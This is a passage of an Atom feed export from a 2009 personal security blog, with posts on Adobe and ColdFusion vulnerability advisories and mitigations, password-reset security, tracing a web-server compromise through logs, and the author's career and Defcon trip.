It is not that it contains highly technical material,  it is just a good story and is put together really well.&lt;br /&gt;"Great for the wife and kids"&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stophcommerce.com/"&gt;Link&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-8973604151874682416?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8973604151874682416/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8973604151874682416' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8973604151874682416'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8973604151874682416'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/08/stop-h-commerce-series-is-finally.html' title='Stop H* Commerce series is finally complete.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SnnDj_lpXMI/AAAAAAAAAMI/JQPFrieyMQ4/s72-c/stop-h-commerce-01.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-3343934626075735497</id><published>2009-08-04T10:34:00.000-07:00</published><updated>2009-08-05T10:53:01.464-07:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='A step ahead'/><category scheme='http://www.blogger.com/atom/ns#' term='Securosis Intern Opportunity'/><category scheme='http://www.blogger.com/atom/ns#' term='Pursue your career'/><title type='text'>Awesome Opportunity for an Up and Coming Security Analyst (Securosis Internship)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/SnnG-Hqf1vI/AAAAAAAAAMY/TuzFCauSEqI/s1600-h/internship+pic+resize.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 193px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/SnnG-Hqf1vI/AAAAAAAAAMY/TuzFCauSEqI/s320/internship+pic+resize.jpg" alt="" id="BLOGGER_PHOTO_ID_5366539201500141298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;There have been a lot of these quick blogs lately,  but I feel that they are right down my alley so the beatings will continue.&lt;br /&gt;Securosis posted over on their highly read, followed, and respected blog that they will be accepting intern opportunities to join their team of professionals in continuing research on security-related topics.&lt;br /&gt;This is a great opportunity for individuals such as myself who are trying to find their way in this industry.&lt;br /&gt;&lt;br /&gt;It could be you!&lt;br /&gt;&lt;br /&gt;Just read about it here. 
- &lt;a href="http://securosis.com/blog/the-securosis-intern-and-contributing-analysts-programs"&gt;LINK&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-3343934626075735497?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/3343934626075735497/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=3343934626075735497' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3343934626075735497'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3343934626075735497'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/08/awesome-opportunity-for-up-and-coming.html' title='Awesome Opportunity for an Up and Coming Security Analyst (Securosis Internship)'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/SnnG-Hqf1vI/AAAAAAAAAMY/TuzFCauSEqI/s72-c/internship+pic+resize.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8191476395170802676</id><published>2009-07-30T12:31:00.000-07:00</published><updated>2009-08-05T10:40:32.920-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Gettin Shitty in Sin City'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Hope I am not attacked by zombie nerd hackers who are hung over.'/><title type='text'>Destination Vegas!!  Yee</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/SnnD_mOS_gI/AAAAAAAAAMQ/NNXlY7hWOm8/s1600-h/lasvegas.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SnnD_mOS_gI/AAAAAAAAAMQ/NNXlY7hWOm8/s320/lasvegas.jpg" alt="" id="BLOGGER_PHOTO_ID_5366535928348343810" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Getting ready to take off for Las Vegas to catch the end of the conventions.  I was not able to get the time to attend Black Hat but on short notice,  I am going out for the defcon meetup.&lt;br /&gt;&lt;br /&gt;It will be nice to meet some professionals in the industry,  and maybe the opportunity to display my special set of skills used in the art of seeking new employment,  whatever that means.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-8191476395170802676?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8191476395170802676/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8191476395170802676' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8191476395170802676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8191476395170802676'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/destination-vegas-yee.html' title='Destination Vegas!!  
Yee'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SnnD_mOS_gI/AAAAAAAAAMQ/NNXlY7hWOm8/s72-c/lasvegas.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-3288310888274394781</id><published>2009-07-23T09:39:00.001-07:00</published><updated>2009-07-23T09:47:27.829-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Top 10 Botnets'/><title type='text'>Top 10 Botnets</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_GV9ejoAirVk/SmiUGBcHrUI/AAAAAAAAALQ/dTtypjdiNJA/s1600-h/botnet-returns_from_death_530+%28Small%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 218px;" src="http://2.bp.blogspot.com/_GV9ejoAirVk/SmiUGBcHrUI/AAAAAAAAALQ/dTtypjdiNJA/s320/botnet-returns_from_death_530+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5361698187571080514" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;A quick Post.&lt;br /&gt;Network world has released a nice article ranking the top 10 botnets in activity.&lt;br /&gt;Ranked by size and strength.&lt;br /&gt;Check it (&lt;a href="http://www.networkworld.com/news/2009/072209-botnets.html"&gt;Link&lt;/a&gt;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-3288310888274394781?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://blog.igothacked.com/feeds/3288310888274394781/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=3288310888274394781' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3288310888274394781'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3288310888274394781'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/top-10-botnets.html' title='Top 10 Botnets'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_GV9ejoAirVk/SmiUGBcHrUI/AAAAAAAAALQ/dTtypjdiNJA/s72-c/botnet-returns_from_death_530+%28Small%29.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-226300460981893713</id><published>2009-07-23T08:46:00.000-07:00</published><updated>2009-07-23T10:29:43.825-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Adobe Reader Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Flash Player Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Critical Adope Vulnerability'/><title type='text'>Another critical issue with Adobe Products.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/SmieA4huHcI/AAAAAAAAALg/gQoR-MPtj-U/s1600-h/193513407_d8c1fecbd5+%28Small%29.jpg"&gt;&lt;img style="margin: 
0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SmieA4huHcI/AAAAAAAAALg/gQoR-MPtj-U/s320/193513407_d8c1fecbd5+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5361709094395583938" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yesterday the 21st Adobe posted on their blog that they are aware of a serious issue and will release more details.   Walking into the office this morning,  they have already provided more details.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;"A &lt;/span&gt;&lt;a style="color: rgb(204, 204, 204);" href="http://www.adobe.com/support/security/severity_ratings.html"&gt;critical&lt;/a&gt;&lt;span style="color: rgb(204, 204, 204);"&gt; vulnerability exists in the current versions of Flash Player (v9.0.159.0 and v10.0.22.87) for Windows, Macintosh and Linux operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat v9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2009-1862) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild via limited, targeted attacks against Adobe Reader v9 on Windows."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The Current Fix&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;"Deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Stay up to date on this issue via their security bulletin. 
(&lt;a href="http://www.adobe.com/support/security/advisories/apsa09-03.html"&gt;Link&lt;/a&gt;)&lt;br /&gt;Also a good write-up by Avert Labs (&lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/"&gt;Link&lt;/a&gt;)&lt;br /&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-226300460981893713?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/226300460981893713/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=226300460981893713' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/226300460981893713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/226300460981893713'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/another-critical-issue-with-adobe.html' title='Another critical issue with Adobe Products.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SmieA4huHcI/AAAAAAAAALg/gQoR-MPtj-U/s72-c/193513407_d8c1fecbd5+%28Small%29.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-2874358515300543816</id><published>2009-07-22T10:04:00.000-07:00</published><updated>2009-09-16T15:30:29.249-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Reset Security'/><category scheme='http://www.blogger.com/atom/ns#' term='James Lester'/><category scheme='http://www.blogger.com/atom/ns#' term='Social Engineering'/><title type='text'>Social Engineering:  Check!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/SmdTyIIiN9I/AAAAAAAAALI/1bLVgDkvieQ/s1600-h/HPIM0975+%28Small%29.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 241px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SmdTyIIiN9I/AAAAAAAAALI/1bLVgDkvieQ/s320/HPIM0975+%28Small%29.JPG" alt="" id="BLOGGER_PHOTO_ID_5361346002049710034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;With everything that you hear about in the news lately regarding social engineering attacks (&lt;a href="http://news.softpedia.com/news/Social-Engineering-Used-to-Compromise-Twitter-117172.shtml"&gt;twitter&lt;/a&gt;),  it makes you wonder how vulnerable you are to this particular type of attack.  Now I have always had some common sense with creating passwords and security questions,  but I have not always been that concerned with security and bottom line,  IM LAZY.&lt;br /&gt;&lt;br /&gt;These days there are multiple levels of authentication that are necessary in order to retrieve a password and although it makes it a little more difficult,  if it is successful,  it usually results in multiple accounts being compromised (myspace --&gt; email --&gt; other email).   I have always tried to create unique difficult security questions for each service or application but this can really become a mess.  
It seems as though the only current solution to this type of mess is something like OpenID or a password manager,  which has security issues and theories on its own,  so I will not get into them.  So for the most part,  you are stuck with multiple sites, with multiple passwords, with multiple security questions, that might be dependent on another service or application to fulfill your password request whether it be authentication or reset.&lt;br /&gt;&lt;br /&gt;While pondering all of these security issues with passwords and social engineering,  the first thing that I went out and did,  was try and reset my password on multiple services and applications to verify that I do not have a weak security question or password.  This was somewhat of a difficult task,  because how would you define which services are in danger of being used for social engineering?  I possibly cannot figure out every single service that I have signed up with and set up my password and secret question for.  What I have to do is analyze which services would ultimately lead to the compromise of high priority or sensitive services,  whether it be its own,  or another service.&lt;br /&gt;I have included in this list.&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Email accounts&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Social Networking Sites&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Financial institutions&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Educational Institution&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Work Related Sites.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;All other sites I would use generic unique throwaway passwords, and if I happen to forget,  I would just have it reset to my email address.  
I am not sure if this would be classified as a security technique,  but more likely classified in the laziness category.&lt;br /&gt;&lt;br /&gt;The next thing that I did,  was visit any social networking sites that I belong to,  to make sure I am not just giving away sensitive information that would assist in social engineering.    I searched these sites for things like making sure my background is not my favorite color (although I would never try to use that type of question as my security question).    I feel that social engineering sites have the potential of giving away more security questions,  than doing a deep dive search into someone's background.  This leads me to the third step that I checked out which is doing a basic search on sites like Google for more information on myself.  I was amazed that the majority of information leakage came from the registration of this domain (thanks whoever,  too bad it is not very accurate).  I thought when I purchased this domain, I paid for suppression of my information but I guess I need to revisit that.&lt;br /&gt;&lt;br /&gt;It is not very easy to assess the difficulty of being victim to Social Engineering attacks.  I think in all reality,  the only way to really know,  is by waiting.  I guess it would be a good idea to ask a really good friend who knows you really well to try to get into some of your services even using his above-average knowledge of your life.   For me,  if some type of compromise would ever occur,  it would be more embarrassing than damaging and either way,  I would love to prevent it from ever occurring.&lt;br /&gt;&lt;br /&gt;Until then,  thank you to Google and Yahoo for going back and reminding me to change my security questions and provide a secondary email address.   
That was very thoughtful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-2874358515300543816?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/2874358515300543816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=2874358515300543816' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2874358515300543816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2874358515300543816'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/social-engineering-check.html' title='Social Engineering:  Check!'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SmdTyIIiN9I/AAAAAAAAALI/1bLVgDkvieQ/s72-c/HPIM0975+%28Small%29.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8263919452700297500</id><published>2009-07-20T15:04:00.000-07:00</published><updated>2009-07-20T15:11:36.343-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='McAfee Site Advisor'/><title type='text'>YourMom may cause a breach of browser security.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://4.bp.blogspot.com/_GV9ejoAirVk/SmTqvWM4q6I/AAAAAAAAAKw/Y8qHsEd1cbA/s1600-h/yourmom+%28Small%29.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 61px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SmTqvWM4q6I/AAAAAAAAAKw/Y8qHsEd1cbA/s320/yourmom+%28Small%29.bmp" alt="" id="BLOGGER_PHOTO_ID_5360667555612109730" border="0" /&gt;&lt;/a&gt;Ha,  Found this on Site Advisor (&lt;a href="http://www.siteadvisor.com/exploit.html?domain=YourMom"&gt;Link&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Even Better.....JamesLester may cause a breach in your browser security.&lt;br /&gt;&lt;a href="http://www.siteadvisor.com/exploit.html?domain=JamesLester"&gt;Link&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-8263919452700297500?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8263919452700297500/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8263919452700297500' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8263919452700297500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8263919452700297500'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/yourmom-may-cause-breach-of-browser.html' title='YourMom may cause a breach of browser security.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SmTqvWM4q6I/AAAAAAAAAKw/Y8qHsEd1cbA/s72-c/yourmom+%28Small%29.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-2080211710116100629</id><published>2009-07-14T15:30:00.001-07:00</published><updated>2009-07-14T16:00:31.842-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='James A. Lester'/><category scheme='http://www.blogger.com/atom/ns#' term='CSI style'/><category scheme='http://www.blogger.com/atom/ns#' term='secure webserver from compromise'/><category scheme='http://www.blogger.com/atom/ns#' term='Log Parsing'/><title type='text'>Fun with Logs:  Chasin Doods Down</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/Sl0McPIQRfI/AAAAAAAAAJ4/Pca7NDGwqXI/s1600-h/Hacked-Banner+%28Small%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 104px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/Sl0McPIQRfI/AAAAAAAAAJ4/Pca7NDGwqXI/s320/Hacked-Banner+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5358452810877781490" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Came in this morning just waiting for something to pop up to get my mind off this little heat wave.&lt;br /&gt;First thing this morning I received another compromise and had an opportunity to do a little investigating.&lt;br /&gt;&lt;br /&gt;The customer came to me stating after an email that alerted him to his website being compromised, he was able to identify a malicious file on his webserver and removed the file.  The next day,  the customer noticed that the file reappeared so he decided to query our service.   
After conducting an interview with the customer,  I was able to request his RAW log files for parsing.  This is where the fun begins.&lt;br /&gt;&lt;br /&gt;After doing a quick parse of the log files searching for signatures related to recent trends, requests that contain SQL injection, or any type of malicious activity, I was able to find a call to a malicious .php file.  I documented the IP address, timestamp and name of the .php file and modified my parsing signatures to further break down this attack. After parsing out the .php file I was able to see in the log files the duration where the customer removed the .php file and where the attacker was able to reapply the file. I was able to use this information to further parse the log files and identify the IP address that initially set up the call to install the malicious .php file for the initial instance and the second installation.  With this information I was able to go back and further modify my parsing to include all requests made by this malicious IP address.   Right before a call to the malicious .php file I was able to document the request that the attacker made to use a page within the customer's admin section to upload a .php file which contains the code to install all malicious .php files.&lt;br /&gt;Forwarding all findings to the customer,  he is now able to get in touch with his hosting company to secure his insecure section of his website.&lt;br /&gt;&lt;br /&gt;There is really nothing out of the ordinary here,  but it has been a while since I've had to do any investigating other than looking at FTP logs and identifying the issue as being Gumblar. It is nice to get back to using skills to chase down legitimate webserver attacks.   It has slowly been picking back up and I hope that these types of opportunities come in at a steady rate.    
The more of these,  the faster the day seems to go by.&lt;br /&gt;And on that note,   time to go home.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-2080211710116100629?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/2080211710116100629/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=2080211710116100629' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2080211710116100629'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2080211710116100629'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/07/fun-with-logs-chasin-doods-down.html' title='Fun with Logs:  Chasin Doods Down'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/Sl0McPIQRfI/AAAAAAAAAJ4/Pca7NDGwqXI/s72-c/Hacked-Banner+%28Small%29.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-741326942896078719</id><published>2009-07-06T15:50:00.000-07:00</published><updated>2009-07-07T09:35:43.532-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FCKEditor Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='FCKEditor 0Day'/><category 
scheme='http://www.blogger.com/atom/ns#' term='0day Cold Fusion Vulnerability'/><title type='text'>0day in Cold Fusion.......Bring Them On!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_GV9ejoAirVk/SlN5Wj91OBI/AAAAAAAAAIA/jUWkMq6IanY/s1600-h/Adobe-ColdFusion-CS3-256x256.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 256px; height: 256px;" src="http://1.bp.blogspot.com/_GV9ejoAirVk/SlN5Wj91OBI/AAAAAAAAAIA/jUWkMq6IanY/s320/Adobe-ColdFusion-CS3-256x256.png" alt="" id="BLOGGER_PHOTO_ID_5355757810392315922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Adobe has &lt;a href="http://blogs.adobe.com/psirt/2009/07/potential_coldfusion_security.html"&gt;Blogged&lt;/a&gt; about a severe issue contained in the FCKEditor that is enabled by default in some versions of ColdFusion 8.    I have finally met up with this particular attack and am actually excited to receive it. It has been a while since I have worked with customers on a compromise that actually occurred due to the insecurity of their webserver (I'm talking about you, Gumblar).&lt;br /&gt;There has not been a patch released yet,  but I am sure that there is one to come.&lt;br /&gt;&lt;br /&gt;In the meantime,  I have some logs to review and websites to manually test (Actual Kinda Police Work Again).&lt;br /&gt;&lt;br /&gt;If you are running ColdFusion 8,  here is a temporary fix to mitigate the issue.  I'll put it up nice and PINK Too!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 255);"&gt;1. Disable connectors by setting config.Enabled to false in the editor/filemanager/connectors/cfm/config.cfm file.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 255);"&gt;2. Remove unused cfm files under editor/filemanager/connectors/cfm directory of the FCKeditor.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 255);"&gt;3. 
Inspect FCKeditor directories for content that has already been uploaded. The uploaded files go under the directory specified in the config.UserFilesPath set in config.cfm.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-741326942896078719?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/741326942896078719/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=741326942896078719' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/741326942896078719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/741326942896078719'/><link rel='alternate' type='text/html' 